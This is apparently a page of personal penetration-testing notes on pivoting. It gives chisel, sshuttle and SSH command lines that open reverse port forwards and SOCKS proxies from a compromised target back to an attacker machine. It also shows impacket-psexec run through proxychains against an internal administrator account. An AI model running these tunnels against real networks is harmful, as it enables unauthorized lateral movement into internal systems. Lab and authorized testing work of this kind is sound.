🧙
Pentesting & Red Teaming Notes
  • Windows
    • Recon - Initial Access
    • Privilege Escalation
      • Enable Privs
      • SeBackupPrivilege
      • SeImpersonatePrivilege
      • SeDebugPrivilege
    • Kerberoasting
    • Lateral Movement
    • MSSQL
    • AD Related
    • Bypass-Evasion Techniques
    • Post Exploitation
    • Miscellaneous
    • UAC Bypass
    • Exploits
      • MS03-026 - RPC DCOM
      • MS04-011 - LSASRV
      • MS08-67 - Netapi
      • MS17-010 - Eternalblue
      • CVE-2019-1388
      • CVE-2020-1472 - Zerologon
      • CVE-2020-16938
      • CVE-2021-1675 - PrintNightmare
      • CVE-2022-21999 - SpoolFool
    • Coerced Auth
  • Linux
  • Abusing Active Directory ACLs
    • ReadLAPSPassword
    • WriteDacl
    • GenericWrite
    • ForceChangePassword
    • WriteOwner
  • Port Forwarding - Tunneling
  • Cloud
  • Mobile
  • Malware Development
    • Process Migration
    • Process Hollowing
    • Dynamic API Resolution
    • Suspended Threads
    • PPID Spoofing
    • Thread Stack Spoofing
    • ETW (Event Tracing for Windows)
    • AMSI Bypass
    • Tools
    • Esoteric
Powered by GitBook
On this page
  • Chisel
  • Sshuttle
  • SSH
  • Regeorg

Port Forwarding - Tunneling

PreviousWriteOwnerNextCloud

Last updated 3 years ago

Chisel

Portforwarding,

Forwarding remote port 8080 to localhost

On kali,

./chisel server --reverse --port 9001

example,
./chisel server --reverse --port 9001

On target,

.\chisel.exe client <kali-ip>:9001 R:<local-port>:127.0.0.1:<target-port>

example,
.\chisel.exe client 10.10.14.38:9001 R:8080:127.0.0.1:8080

Sock5 proxy with chisel,

On kali,

./chisel server -p 9001 --socks5 --reverse

On target,

chisel client <kali-ip>:9001 R:5000:socks

R:5000:socks

  • the R means that we want to perform a reverse port forward.

  • 5000 will be the port on the attacker machine that will act as the entry point to our SOCKS5 proxy; and

  • socks simply means we are using the SOCKS protocol.

Add socks5 127.0.0.1 5000 to /etc/proxychains.conf

  • Don't forget to disable DNS resolution over proxychains.

udp port forward

/opt/chisel/chisel_1.7.7_linux_386 server --reverse --port 9001
./chisel_1.7.7_linux_386  client 192.168.119.203:9001 R:10.1.1.89:1978/udp

Sshuttle

This is the best tunneling tool

Standalone (compiled and ready to be executed) binaries,

sshuttle -vvv -e 'ssh -i id_rsa' -r morph3@10.11.1.252 -x 10.11.1.252 10.2.2.1/24
sudo ./sshuttle -e "ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -c 3des-cbc" -r morph3@10.11.1.252:22000 10.2.2.1/24

SSH

Port forwarding,

forwards remote host 10.10.10.99:2049 back to localhost:2049

ssh -L 127.0.0.1:1978:10.10.10.99:1978 morph3@1.3.3.7

Tunneling,

ssh morph3@1.3.3.7 -p22000 -D 127.0.0.1:1080
proxychains firefox
proxychains impacket-psexec administrator@10.13.37.1

Regeorg

https://github.com/jpillora/chisel/releases
https://github.com/sshuttle/sshuttle
https://github.com/rholder/sshuttle-binary/releases/tag/v0.78.5
https://github.com/rholder/sshuttle-binary/releases/tag/v0.78.0
https://github.com/sensepost/reGeorg